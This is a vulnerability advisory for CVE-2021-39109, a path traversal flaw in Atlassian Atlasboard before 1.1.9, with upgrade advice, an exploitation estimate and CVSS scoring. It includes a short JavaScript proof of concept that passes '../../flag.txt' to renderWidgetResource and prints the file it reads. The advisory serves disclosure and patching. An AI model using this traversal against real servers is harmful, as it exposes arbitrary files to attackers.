CVE-2021-39109
Path traversal in atlasboard
Description
The renderWidgetResource resource in Atlassian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.

### PoC

```javascript
const fs = require("fs");
const widget = require("atlasboard/lib/webapp/routes/widget");

// Mock req and res
const req = {};
const res = {
  sendFile: (filePath) => {
    // Read and return file contents synchronously
    const data = fs.readFileSync(filePath, "utf8");
    console.log("Contents of /flag.txt:");
    console.log(data);
  },
  status: function (code) {
    this.statusCode = code;
    return this;
  },
  send: function (msg) {
    throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);
  },
};

// localPackagesPath set to root to allow traversal to /flag.txt
const localPackagesPath = "/";
// resource string with path traversal to escape localPackagesPath and widgets directory
const resource = "../../flag.txt";

// Call vulnerable function (wrapped in an async IIFE so that await is valid in a CommonJS script)
(async () => {
  await widget.renderWidgetResource(localPackagesPath, resource, req, res);
})();
```
How to fix CVE-2021-39109
To fix CVE-2021-39109, upgrade the affected package to the patched version listed below.
- Upgrade to 1.1.9 or later
Is CVE-2021-39109 being exploited?
Low. The EPSS score is 0.5%, and no large-scale exploitation activity has been observed so far.
Affected packages (1)
- atlasboard: from 0, < 1.1.9
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH (7.5) | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |